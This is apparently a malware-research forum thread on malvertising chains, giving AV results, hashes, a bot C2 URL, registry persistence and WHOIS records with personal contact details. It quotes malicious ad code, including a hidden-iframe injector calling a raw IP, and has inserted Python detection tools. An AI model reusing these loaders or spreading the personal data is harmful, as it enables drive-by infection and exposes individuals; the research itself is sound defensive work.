  3. CreateControlRange - Microsoft 'msdds.dll' COM Object - EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (MS05-052)
  4. NCTAudioFile2 - 77829F14-D911-40FF-A2F0-D11DB8D6D0BC
  5. DirectAnimation.PathControl
  6. collab.CollabEmailInfo - PDF exploit
  7. Microsoft Office Snapshot Viewer ActiveX - snpvw.Snapshot Viewer Control.1
As a result we bump into an executable or the PDF file but both roads will lead to Rome, don't worry.
File winNOFZCyliz5mmRR.exe received on 12.30.2008 19:34:24 (CET)
Prevx1 V2 2008.12.30 Malicious Software

Additional information
File size: 22016 bytes
MD5...: aed7ff081368ed161dc465073b495621
SHA1..: 2f47945de7d64e37f19b1f16b28ac81110db6295
SHA256: fbf6ded11754699cffea12a49cd13a993794e9ef5a640154e28d78a56ecca99a
Result: 1/39
______________________________

File pdf.php received on 12.30.2008 20:34:35 (CET)
a-squared 4.0.0.73 2008.12.30 Exploit.Win32.Pdfjsc.G!IK
AntiVir 7.9.0.45 2008.12.30 HEUR/HTML.Malware
Avast 4.8.1281.0 2008.12.30 JS:Pdfka-N
BitDefender 7.2 2008.12.30 Exploit.PDF-JS.Gen
GData 19 2008.12.30 JS:Pdfka-N
Ikarus T3.1.1.45.0 2008.12.30 Exploit.Win32.Pdfjsc.G
Kaspersky 7.0.0.125 2008.12.30 Exploit.JS.Pdfka.dc
SecureWeb-Gateway 6.7.6 2008.12.30 Heuristic.HTML.Malware
Sophos 4.37.0 2008.12.30 Troj/PDFJs-G
Symantec 10 2008.12.30 Bloodhound.Exploit.196

Additional information
File size: 8453 bytes
MD5...: 78278a100af54b228fb9fd96e74f1961
SHA1..: 4a9d17c6698878f3c20847f336eeb209e7bb2cbd
SHA256: e2f999a29ecc713e6a09a1906870bbc87084e6b5db1da4da8a995a7b49e1bab8
Result: 10/39
load.exe saved as winNOFZCyliz5mmRR.exe

Upon execution this file writes into the memory space of svchost.exe. A couple of moments later we see an outbound request to 210.83.85.100
IPB Image

orzsystem.cn/ldr/controller.php?action=bot&entity_list=&uid=[*]&first=[*]&guid=[*]&rnd=[*]
Files added:
%System%\digeste.dll
Registry changes:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders]
SecurityProviders = "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digeste.dll"
Mutex objects:
_SYSTEM_A6F2DE5_
_SYSTEM_F2A5DE7_
digeste.dll:
File digeste.dll received on 12.30.2008 19:58:53 (CET)
Sophos 4.37.0 2008.12.30 Sus/Behav-258

Additional information
File size: 22016 bytes
MD5...: c388c7ef7f5047ab8b0f9ab99cf14cbc
SHA1..: a551dbb244a5bc7e0a54d9c4c3d7b54ca6a81220
SHA256: fffb728fc3bafbf4c13f2bb5fe6e9f5bfd598284f753832785bae75b230f7cd5
Result: 1/39
<h4>
www.userplane.com
</h4>
There is a point to which I would like to draw your attention after we saw what happened on the MySpace chat.

Who is www.userplane.com - Userplane Integrated Ad Revenue Share

UserPlane
QUOTE
Userplane™ is the world’s premier social software provider for online communities. Our award-winning technology makes it easy for website owners and publishers to add free content, functionality and advertising in an instant. Grow your community – and your revenue – with Userplane.

UserPlaneApps
QUOTE
Flash Chat | Webchat 2: Video Chat Software | Webmessenger 2: Instant Messaging Software | Webrecorder: Webcam Software
Desktop: Web User Presence Detection | Feeds: Free APIs | Internet Ads | Free Web Chat | Dating Blog

As we notice, they are integrated in many web solutions and very present in Webchat / Instant Messaging software such as MySpace Chat, Paltalk, Facebook, Friendster, AIM ... This overall presence might also explain why people keep complaining about redirects on Friendster, MySpace, Facebook, DeviantArt, etc. for several weeks now. This is a huge advertising network.

More reading if you wish:

http://wiki.userplane.com/docs/doku.php?id=platforms
http://wiki.userplane.com/docs/doku.php?id=start
http://dev.aol.com/aim/advertising
http://www.reuters.com/article/pressReleas...2008+BW20080717

Here we go again … for several months we have expressed our grief about the lack of investigation when acquiring advertisements and provided information on what should be paid attention to. Sandi, I & others have been following this "saga" for over a year now and each month, week, day things just get worse. For the past weeks we saw (again) an increase in malicious advertising. Forums and their respective helpers are overwhelmed by infected computers and I'm pretty sure that lately more than 50% have been victims of malvertizements; this is unacceptable.
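Added example, not tooling from this thread: the registry change listed in the MySpace analysis above appends digeste.dll to the SecurityProviders value, the list of security support provider DLLs that lsass.exe loads at boot, and the name differs from the legitimate digest.dll by one letter. The Python below audits that value against an allowlist and calls out lookalike names by edit distance, so the check works even when the attacker picks a different near-miss next time. The allowlist is an assumption seeded from the four entries in the value quoted above; maintain it per OS build from a known-clean reference machine. The live-read helper needs Windows; the audit itself runs anywhere.

```python
"""Audit the SecurityProviders registry value that the dropped digeste.dll
hooks into. Pure-function check (runs anywhere) plus an optional live read on
Windows. Added example, not tooling from the thread."""
import platform
from typing import Dict, List

# Assumed allowlist: the value quoted in the thread minus the added entry.
# Maintain this per OS build from a known-clean reference machine.
KNOWN_GOOD = ["msapsspc.dll", "schannel.dll", "digest.dll", "msnsspc.dll"]

REG_PATH = r"SYSTEM\CurrentControlSet\Control\SecurityProviders"

# Value as reported in the thread's analysis of winNOFZCyliz5mmRR.exe.
OBSERVED = "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digeste.dll"


def parse_providers(value: str) -> List[str]:
    """Split the comma-separated REG_SZ into normalised DLL names."""
    return [p.strip().lower() for p in value.split(",") if p.strip()]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot lookalike names such as digeste.dll."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_providers(value: str, known_good: List[str] = KNOWN_GOOD) -> Dict[str, object]:
    """Report entries outside the allowlist and which legitimate name each one imitates."""
    entries = parse_providers(value)
    good = [g.lower() for g in known_good]
    unexpected = [e for e in entries if e not in good]
    lookalikes: Dict[str, str] = {}
    for e in unexpected:
        closest = min(good, key=lambda g: edit_distance(e, g))
        if edit_distance(e, closest) <= 2:
            lookalikes[e] = closest
    return {"entries": entries, "unexpected": unexpected,
            "lookalikes": lookalikes, "clean": not unexpected}


def read_live_value() -> str:
    """Read the value from the local registry (Windows only)."""
    if platform.system() != "Windows":
        raise OSError("live read requires Windows")
    import winreg  # only importable on Windows
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, REG_PATH) as key:
        value, _ = winreg.QueryValueEx(key, "SecurityProviders")
    return value


if __name__ == "__main__":
    try:
        value = read_live_value()
    except OSError:
        value = OBSERVED
    print(audit_providers(value))
```

An unexpected entry here deserves the same response as any other persistence finding: pull the DLL (the hash above identifies this one), check which process loaded it, and remove the entry before reboot so lsass does not load it again. Because the list is read by lsass at boot, a stale allowlist produces false positives after OS updates, which is why the allowlist is per build.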
Kimberly
<h4>
IP Details from the MySpace incident
</h4>
At the time of the first incident, www.prolinar.com was registered to Estdomains. Since they have been terminated, www.prolinar.com's registrar is now Directi.

www.prolinar.com - 94.76.208.14

Updated Date: 08-dec-2008
Creation Date: 18-nov-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.PROLINAR.COM - NS2.PROLINAR.COM
Registrant: Thomas Schultz
Thomas Schultz (ts8317@googlemail.com)
Friedrichstaler Allee 50
Karlsruhe
Baden-Wurttemberg,76131
DE
Tel. +072.697040
______________________________

test.3tmp3.com

NO IP - domain has been suspended today.

Updated Date: 31-dec-2008
Creation Date: 17-feb-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM

Registrant: Konstantin Fetisov (akafitis@gmail.com)
4-1-62 Dm. Ulyanova street
Moscow
Moskovskaya oblast,119333
RU
Tel. +7.4955178378
______________________________

media-drive.com

NO IP - domain has been suspended today.

Updated Date: 31-dec-2008
Creation Date: 13-oct-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM
Registrant: Thomas Schultz
Thomas Schultz (ts8317@googlemail.com)
Friedrichstaler Allee 50
Karlsruhe
Baden-Wurttemberg,76131
DE
Tel. +072.697040
______________________________

orzsystem.cn - 210.83.85.100

Registration Date: 2008-12-11 01:16
Expiration Date: 2009-12-11 01:16
ROID: 20081211s10001s93687983-cn
Registrant Organization: BestHost, icn.
Registrant Name: LucasSteven
Administrative Email: steven_lucas_2000@yahoo.com
Name Server:ns1.dcn5100.com - ns2.dcn5100.com
______________________________

advanced-antivirus-scanner.com - 88.198.0.143

Registered: 25 December 2008
Registrar: TODAYNIC.COM
Name Servers: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrant: Valensia M Dobbson - valensiam@yahoo.com
______________________________

While Directi did suspend 2 of the involved domains today, I don't get why www.prolinar.com wasn't suspended as well. The registrant is also Thomas Schultz ... I'm expecting to see new redirects set up at www.prolinar.com very soon ... if not already done.
Kimberly
<h4>
Some never learn ...
</h4>
Yahoo
CODE
</script><iframe width="468"  height="60"  frameborder="0"  src="http://a2.warmnetworks.com/ad?zo=52&w=468&h=60&ct=1&t=1230913333" scrolling="no" marginwidth="0" marginheight="0"></iframe></body></html>
a2.warmnetworks.com
CODE
<iframe width="468" height="60" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://ads.bootcampmedia.com/servlet/ajrotator/477175/0/vh?z=BootCamp&dim=335832"><script
language=JavaScript
src="http://ads.bootcampmedia.com/servlet/ajrotator/477175/0/vj?z=BootCamp&dim=335832&abr=$scriptiniframe"></script><noscript><a
href="http://ads.bootcampmedia.com/servlet/ajrotator/477175/0/cc?z=BootCamp"><img
src="http://ads.bootcampmedia.com/servlet/ajrotator/477175/0/vc?z=BootCamp&dim=335832&abr=$imginiframe"
width="468" height="60" border="0"></a></noscript></iframe>
ads.bootcampmedia.com
CODE
document.write('<scri' + 'pt type="text/javascript" src="http://banners.exitexchange.com/banner_js?pubid=' + pubid + '&bsize=' + bsize + '&rnd=' + rnd + '&ts=' + ts.getTime() + '"></sc' + 'ript>');
banners.exitexchange.com
CODE
document.write('<div style="width:468px;height:60px">');document.write('<a href=\'http://www.thinkhost.com?p=82369a5f&b=4d673960\' target="_blank">\n<img src=\'http://www.affiliates.thinkhost.com/apn/scripts/sb.php?p=82369a5f&b=4d673960\' \nalt="Special web hosting offer - LIMITED TIME ONLY" title="Special web hosting offer - LIMITED TIME ONLY"></a><iframe src="http://count.exit1208.com/exit/1215643?3388083" border="0" scrolling="no" style="visibility: hidden" width="1" height="1"></iframe>');document.write('</di'+'v>');
count.exit1208.com
CODE
<iframe src="http://ashoping.com/?sid=aff0048" name="EEmF1" height="100%" width="100%" scrolling="auto" marginwidth=0 marginheight=0></iframe></td>
ashoping.com (Dec 24 2008)
CODE
<script language='JavaScript'>
            var iframe = document.createElement('iframe');
            var sgKSL = 'http://BZi7GWiTay/css/index.php?sid=';
            iframe.height   = 1;
            iframe.width    = 1;
            iframe.src      = sgKSL.replace('BZi7GWiTay', '85.12.43.127') + 'e0d3e0d3e2dbebd8eadbe68fff90f88bead7e2d4e5dceadbd7';
            document.body.appendChild(iframe);
        </script>
<h4>
IP Details
</h4>
domains sharing nameservers

ashoping.com | automobilewdew.com | bigmp3online.com | buynow21.com | detoxitnow.com | financestoc.com | greatlakemusic.com | mp3cdt.com | travelcardclub.com
______________________________

a2.warmnetworks.com - 67.221.32.207

Hidden behind Domains by Proxy, Inc.
Domain servers in listed order:
NS11.DOMAINCONTROL.COM
NS12.DOMAINCONTROL.COM
______________________________

ads.bootcampmedia.com - 64.237.103.151

aka rotator.adjuggler.com <-- I know exactly who to contact.
Updated Date: 05-dec-2008
______________________________

AdJuggler.

The "rotator.adjuggler.com" case
Photobucket ... more malvertizing problems
Photobucket - AdJuggler aka efx.add50.com / rotator.adjuggler.com
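Added example, not tooling from this thread: the chain quoted in this post relies on a handful of loader tricks, a 1x1 iframe with visibility hidden written from a JavaScript string, an iframe element created at run time with its hostname assembled by replace(), and a script tag split into '<scri' + 'pt'. The Python below parses captured ad-tag HTML and reports each of those, which is the kind of pre-flight check an ad network or publisher can run on every creative it serves. The heuristics are assumptions chosen for this example, and the sample HTML is constructed from the snippets above (the hostnames are the ones quoted in the thread).

```python
"""Triage captured ad-tag HTML for the loader tricks quoted in this thread:
1x1 or invisible iframes, iframes written from JavaScript strings, iframe
elements created at run time, hostnames assembled with replace(), and escaped
markup. Added example, not tooling from the forum; the sample below is
constructed from the snippets in the post."""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urlsplit

SCRIPT_HEURISTICS = {
    "split-tag-write": re.compile(r"['\"]<scri['\"]\s*\+\s*['\"]pt", re.I),
    "runtime-iframe": re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I),
    "host-substitution": re.compile(
        r"\.replace\(\s*['\"][^'\"]+['\"]\s*,\s*['\"][^'\"]+['\"]\s*\)\s*\+", re.I),
    "escaped-markup": re.compile(r"unescape\(\s*['\"]%3C", re.I),
}
IFRAME_IN_STRING = re.compile(r"<iframe[^>]*>", re.I)

# Constructed sample assembled from the snippets quoted in this post.
SAMPLE = """<html><body>
<script type="text/javascript">
document.write('<div style="width:468px;height:60px">');
document.write('<iframe src="http://count.exit1208.com/exit/1215643?3388083" border="0" scrolling="no" style="visibility: hidden" width="1" height="1"></iframe>');
document.write('</di'+'v>');
</script>
<script language='JavaScript'>
  var iframe = document.createElement('iframe');
  var sgKSL = 'http://BZi7GWiTay/css/index.php?sid=';
  iframe.height = 1;
  iframe.width = 1;
  iframe.src = sgKSL.replace('BZi7GWiTay', '85.12.43.127') + 'e0d3e0d3';
  document.body.appendChild(iframe);
</script>
<script>
document.write('<scri' + 'pt type="text/javascript" src="http://banners.exitexchange.com/banner_js?pubid=1"></sc' + 'ript>');
</script>
<iframe src="http://ads.example-network.test/banner" width="468" height="60"></iframe>
</body></html>"""


def _dim(value: Optional[str]) -> int:
    """Pixel size of a width/height attribute; unknown or percent sizes count as large."""
    if value is None:
        return 10 ** 6
    v = value.strip().lower().rstrip("px")
    return int(v) if v.isdigit() else 10 ** 6


class AdTagScanner(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Dict[str, str]] = []
        self._in_script = False
        self._script: List[str] = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = _dim(a.get("width")) <= 1 and _dim(a.get("height")) <= 1
            hidden = "visibility:hidden" in style or "display:none" in style
            if tiny or hidden:
                src = a.get("src", "")
                self.findings.append({"kind": "hidden-iframe",
                                      "host": urlsplit(src).hostname or "", "detail": src})
        elif tag == "script":
            self._in_script, self._script = True, []

    def handle_data(self, data):
        if self._in_script:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self._check_script("".join(self._script))

    def _check_script(self, code: str) -> None:
        # iframes written from JS strings never reach handle_starttag; re-parse them.
        for frag in IFRAME_IN_STRING.findall(code):
            sub = AdTagScanner()
            sub.feed(frag)
            self.findings.extend(sub.findings)
        for name, rx in SCRIPT_HEURISTICS.items():
            m = rx.search(code)
            if m:
                self.findings.append({"kind": name, "host": "", "detail": m.group(0)[:60]})


def scan_ad_tag(html: str) -> List[Dict[str, str]]:
    """All findings for one captured tag, in document order."""
    p = AdTagScanner()
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for f in scan_ad_tag(SAMPLE):
        print(f)
```

Feed it the raw response of each hop in the chain rather than the rendered page, since the interesting iframe only exists inside a string until the browser runs the script. A hidden-iframe hit gives the next host to pull and scan; the script heuristics are weaker signals on their own, but an ad creative has no honest reason to build a hostname with replace() or to split a script tag in two.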
Kimberly
<h4>
gotoyourclicks.cn - advanced-anti-virus-scanner.com - clickoverridesystem.cn - anti-virus-secure-scanner.com
</h4>
More Antivirus 2009 Redirects
gotoyourclicks.cn/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
advanced-anti-virus-scanner.com/2009/1/en/freescan.php?id=[*]

clickoverridesystem.cn/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
anti-virus-secure-scanner.com/2009/1/en/freescan.php?id=[*]
gotoyourclicks.cn - 78.46.101.234

Registration Date: 2008-12-25 18:49
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
*Sponsoring Registrar: 广东时代互联科技有限公司
Administrative Email: promasteryouth@gmail.com

Google Translation: Guangdong era of the Internet Technology Co., Ltd.
Website for this Registrar appears to be www.now.cn


advanced-anti-virus-scanner.com - 64.20.38.91 / 69.10.49.193 / 75.126.74.181 / 78.159.118.144 / 84.16.224.115

Updated Date: 29-dec-2008
Creation Date: 25-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Name: Valensia M Dobbson - Email: ValensiaM@yahoo.com

clickoverridesystem.cn - 91.211.64.68

Registration Date: 2008-12-25 18:49
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
*Sponsoring Registrar: 广东时代互联科技有限公司
Administrative Email: promasteryouth@gmail.com

Google Translation: Guangdong era of the Internet Technology Co., Ltd.
Website for this Registrar appears to be www.now.cn


anti-virus-secure-scanner.com - 89.149.227.196

Updated Date: 29-dec-2008
Creation Date: 25-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Name: Valensia M Dobbson - Email: ValensiaM@yahoo.com
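Added example, not tooling from this thread: across these posts the same pivots keep tying domains together, a shared IP (88.198.0.143, 78.46.101.234, 91.211.64.31), a shared registrant address (promasteryouth@gmail.com, idomains.admin@gmail.com, robertmwards@gmail.com) and shared nameservers, and the earlier post even shows the three "free DNS" nameserver sets resolving to the same addresses. The Python below turns the IP details sections into records and clusters them with union-find so new domains can be placed next to known ones. The records are copied from the whois/IP sections above as looked up at the time of each post; which pivots count is a choice the analyst makes, and nameservers are off by default because a free DNS provider links unrelated customers.

```python
"""Cluster the domains from this thread's IP details by the pivots the thread
itself uses: shared IP, shared registrant e-mail and shared nameservers.
Added example, not tooling from the forum; the records are copied from the
whois/IP sections above (values as looked up at the time of each post)."""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass
class Record:
    domain: str
    ips: List[str] = field(default_factory=list)
    nameservers: List[str] = field(default_factory=list)
    email: Optional[str] = None


FREEHOST = ["ns1.freehostns.com", "ns2.freehostns.com", "ns3.freehostns.com"]
MANAGEHOST = ["ns1.managehostdns.com", "ns2.managehostdns.com", "ns3.managehostdns.com"]

RECORDS = [
    Record("clicksadssystems.com", ["78.46.205.65"], MANAGEHOST),
    Record("updatedownloadlists.com", ["78.46.216.238"], MANAGEHOST),
    Record("secured-live-scan.com", ["78.46.205.69"], FREEHOST, "promasteryouth@gmail.com"),
    Record("securedliveclicks.com", ["88.198.0.143"], FREEHOST, "promasteryouth@gmail.com"),
    Record("antivirusdefencescanner.com", ["88.198.0.143"], FREEHOST, "promasteryouth@gmail.com"),
    Record("gotoyourclicks.cn", ["78.46.101.234"], FREEHOST, "promasteryouth@gmail.com"),
    Record("liveantiviruspccheck.com",
           ["84.16.224.115", "64.20.38.91", "69.10.49.193", "78.47.248.118", "78.159.118.144"],
           FREEHOST, "promasteryouth@gmail.com"),
    Record("advanced-anti-virus-scanner.com",
           ["64.20.38.91", "69.10.49.193", "75.126.74.181", "78.159.118.144", "84.16.224.115"],
           FREEHOST, "ValensiaM@yahoo.com"),
    Record("00119922.com", ["87.248.163.58"], ["ns3.my2ns.net", "ns4.my2ns.net"]),
    Record("hitstransfer.com", ["91.211.64.31"],
           ["ns1.hitstransfer.com", "ns2.hitstransfer.com"], "robertmwards@gmail.com"),
    Record("netsecuritybureau.com", ["91.211.64.31"],
           ["ns1.netsecuritybureau.com", "ns2.netsecuritybureau.com"], "robertmwards@gmail.com"),
    Record("ad.getfreeiphone.us", ["70.38.19.203"],
           ["ns1.getfreeiphone.us", "ns2.getfreeiphone.us"], "idomains.admin@gmail.com"),
    Record("tds.traffrotator.info", ["67.205.93.102"], ["ns1.traffrotator.info", "ns2.traffrotator.info"]),
    Record("adtds.mgrotator.info", ["67.205.93.102"],
           ["ns1.mgrotator.info", "ns2.mgrotator.info"], "idomains.admin@gmail.com"),
    Record("best-antivirus-scanner-ever.info", ["67.205.75.14"],
           ["ns1.best-antivirus-scanner-ever.info", "ns2.best-antivirus-scanner-ever.info"],
           "idomains.admin@gmail.com"),
]
BY_NAME = {r.domain: r for r in RECORDS}


def cluster(records: Iterable[Record], pivots: Tuple[str, ...] = ("ip", "email")) -> List[List[str]]:
    """Connected components over the chosen pivots, largest group first."""
    records = list(records)
    parent = {r.domain: r.domain for r in records}

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    # pivot key -> every domain that carries it
    index: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for r in records:
        if "ip" in pivots:
            for ip in r.ips:
                index[("ip", ip)].append(r.domain)
        if "email" in pivots and r.email:
            index[("email", r.email.lower())].append(r.domain)
        if "ns" in pivots:
            for ns in r.nameservers:
                index[("ns", ns.lower())].append(r.domain)
    for domains in index.values():
        for d in domains[1:]:
            parent[find(d)] = find(domains[0])
    groups: Dict[str, List[str]] = defaultdict(list)
    for r in records:
        groups[find(r.domain)].append(r.domain)
    return sorted((sorted(g) for g in groups.values()), key=len, reverse=True)


def shared_pivots(a: Record, b: Record) -> List[str]:
    """The concrete evidence that ties two records together."""
    out = [f"ip:{ip}" for ip in a.ips if ip in b.ips]
    if a.email and b.email and a.email.lower() == b.email.lower():
        out.append(f"email:{a.email.lower()}")
    b_ns = {n.lower() for n in b.nameservers}
    out += [f"ns:{n.lower()}" for n in a.nameservers if n.lower() in b_ns]
    return out


if __name__ == "__main__":
    for group in cluster(RECORDS, ("ip", "email", "ns")):
        print(group)
```

With IP and e-mail only, the promasteryouth and Valensia domains fall into one group of six (advanced-anti-virus-scanner.com joins through the five addresses it shares with liveantiviruspccheck.com), the getfreeiphone set forms a second, and the two Robert Ward domains a third; switching nameservers on merges the two managehostdns domains as well. When a new freescan.php domain shows up, add its record and see which group it lands in before spending time on a fresh investigation; shared_pivots() gives the one-line justification for a takedown request.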
Kimberly
<h4>
WARNING: PhotoBucket - Free Apple iPhone
</h4>
A yet unseen malvertizement offering a Free Apple iPhone is being displayed at Photobucket.

Screenshot in situ.
IPB Image
Banner.
ad.getfreeiphone.us/swf/235754_160x600g.swf
IPB Image IPB Image
Campaign.
ad.getfreeiphone.us/rotator.php?campaign=[*]
ad.getfreeiphone.us/in.cgi?[*]
ad.getfreeiphone.us/swf/235754_160x600g.swf
tds.traffrotator.info/?paramss=[*]
adtds.mgrotator.info/in.cgi?[*]
best-antivirus-scanner-ever.info/scan.php?campaign=[*]
Cookie for ad.getfreeiphone.us is set to adtds2.promoplexer.com.

Clicktag

I usually don't display the Clicktags from the malvertizements but this time the website itself is owned by the same guys.
getfreeiphone.us/index.php?campaign=[*]
This time we end up at Antivirus 2010.
IPB Image
<h4>
IP Details
</h4>
ad.getfreeiphone.us - 70.38.19.203

Domain Registration Date: Thu Nov 06 11:53:56 GMT 2008
Sponsoring Registrar: ENOM, INC.
Name Server: NS1.GETFREEIPHONE.US - NS2.GETFREEIPHONE.US
Registrant Name: Ivan Durov - Kiev - idomains.admin@gmail.com

getfreeiphone.us - 70.38.19.206

Domain Registration Date: Thu Nov 06 11:53:56 GMT 2008
Sponsoring Registrar: ENOM, INC.
Name Server: NS1.GETFREEIPHONE.US - NS2.GETFREEIPHONE.US
Registrant Name: Ivan Durov - Kiev - idomains.admin@gmail.com

tds.traffrotator.info - 67.205.93.102

Created On:08-Dec-2008 22:38:19 UTC
Last Updated On:09-Dec-2008 11:22:33 UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Name Server:NS1.TRAFFROTATOR.INFO - NS2.TRAFFROTATOR.INFO
Registrant Name: WhoisGuard Protected

adtds.mgrotator.info - 67.205.93.102

Created On:26-Dec-2008 16:42:08 UTC
Last Updated On:26-Dec-2008 17:49:26 UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Name Server:NS1.MGROTATOR.INFO - NS2.MGROTATOR.INFO
Registrant Name: Ivan Durov - Kiev - idomains.admin@gmail.com

best-antivirus-scanner-ever.info - 67.205.75.14

Created On:26-Dec-2008 19:31:22 UTC
Last Updated On:26-Dec-2008 19:50:39 UTC
Sponsoring Registrar:eNom, Inc. (R126-LRMS)
Name Server:NS1.BEST-ANTIVIRUS-SCANNER-EVER.INFO - NS2.BEST-ANTIVIRUS-SCANNER-EVER.INFO
Registrant Name: Ivan Durov - Kiev - idomains.admin@gmail.com
Kimberly
<h4>
Seen in the wild ...
</h4>
PG Alert.
IPB Image
Cause.
File 1.swf received on 01.04.2009 02:43:14 (CET)

Additional information
File size: 16570 bytes
MD5...: fc078089030cd99081c6e4381afc5451
SHA1..: 1538ca9fa824de3f6a80206eca4090ec7abceefa
SHA256: e7f0bfb12c34ef95951cb528d098cfce4900a812031c961c3886670fd9fbe626
packers (Kaspersky): Swf2Swc
Results: 0/38
Flash Code.
IPB Image

IPB Image
Executable.
IPB Image

File wJQs.exe received on 01.04.2009 03.25.47 (CET)

Kaspersky 7.0.0.125 2009.01.04 Trojan.Win32.Agent.bcuy
Prevx1 V2 2009.01.04 Information Stealer
Sophos 4.37.0 2009.01.04 Troj/Daonol-Fam
TrendMicro 8.700.0.1004 2009.01.02 PAK_Generic.001

Additional information
File size: 13312 bytes
MD5...: 5929b0d056a0c549ed53fe2f53370999
SHA1..: 602a66bb323b556a190c0f5964e0a73428d92d0d
SHA256: 65e097c7eb85ea3cce3c4d856942fb2273036a9fe4d0423acd29f22e9b5d1897
Results: 4/38
Kimberly
<h4>
TrafficHunter
</h4>
ALL advertising content from TrafficHunter - traffichunter.net & traffichunters.net - should be treated with EXTREME CAUTION
IPB Image
Compared to OlympicMedia, 1 spelling error has been fixed on the main page but not on the other pages. The site template also refers to Olympic Media as seen below.
CODE
<a href="index.html" tppabs="http://traffichunter.net/index.html" title="OLYMPIC MEDIA"><div id="olimpic">TRAFFIC<b>HUNTER</b></div></a>
Furthermore, the images referenced in traffichunter.net/styles.css are linking to olympicmedia.net.
CODE
#menu {
    height:38px;
    margin: 0 62px;
    font-family: "Myriad Pro";
    font-size: 14px;
    color: #f9f9f9;
    background-image: url("img/dot.gif"/*tpa=http://olympicmedia.net/img/dot.gif*/);
    background-position: right 3px;
    background-repeat: no-repeat;
    clear: both;
    overflow: hidden;
}

IPB Image
You can read all the details at Sandi's site. You will see that she also shows a connection between ashoping.com and traffichunters.net.

One small detail I would like to draw your attention to is the fact that almost all sites sharing their IP with ashoping.com have been involved in distributing malware, although they are registered to different people. - Ref.
Kimberly
<h4>
becometrueclick.cn - livepcantivirusscan.com - protecteduser.cn - live-antivirus-pc-scan.com
</h4>
More Antivirus 2009 Redirects
becometrueclick.cn/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
livepcantivirusscan.com/2009/1/en/freescan.php?id=[*]

protecteduser.cn/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
live-antivirus-pc-scan.com/2009/1/en/freescan.php?id=[*]
becometrueclick.cn - 78.46.101.234

Registration Date: 2008-12-25 18:49
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
*Sponsoring Registrar: 广东时代互联科技有限公司
Administrative Email: promasteryouth@gmail.com

Google Translation : Guangdong era of the Internet Technology Co., Ltd.
Website for this Registrar appears to be www.now.cn


livepcantivirusscan.com - 64.20.38.91 / 69.10.49.193 / 91.211.64.68 / 212.117.164.120

Updated Date: 08-jan-2009
Creation Date: 25-dec-2008
Name Server: SKY.EARTH.ORDERBOX-DNS.COM - SKY.MARS.ORDERBOX-DNS.COM -SKY.MERCURY.ORDERBOX-DNS.COM - SKY.VENUS.ORDERBOX-DNS.COM
Registrar: TODAYNIC.COM, INC.
Name: Valensia M Dobbson - Email: ValensiaM@yahoo.com

protecteduser.cn - 88.198.0.143

Registration Date: 2008-12-25 19:07
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
*Sponsoring Registrar: 广东时代互联科技有限公司
Administrative Email: MoiraJonesms@googlemail.com

Google Translation : Guangdong era of the Internet Technology Co., Ltd.
Website for this Registrar appears to be www.now.cn


live-antivirus-pc-scan.com - 89.149.227.196

Updated Date: 05-jan-2009
Creation Date: 25-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Name: Valensia M Dobbson - Email: ValensiaM@yahoo.com
Kimberly
<h4>
WARNING: notalwaysright.com - AdECN
</h4>
Be very careful when visiting notalwaysright.com. No Flash this time but a PDF exploit coming through AdECN. Regular readers will recognize a couple of familiar domains.

Links.
ad2.adecn.com/here.spot?v=2.2;time=[*];spotId=[*];c=0;ms=[*]
cds.adecn.com/adecn/script.js
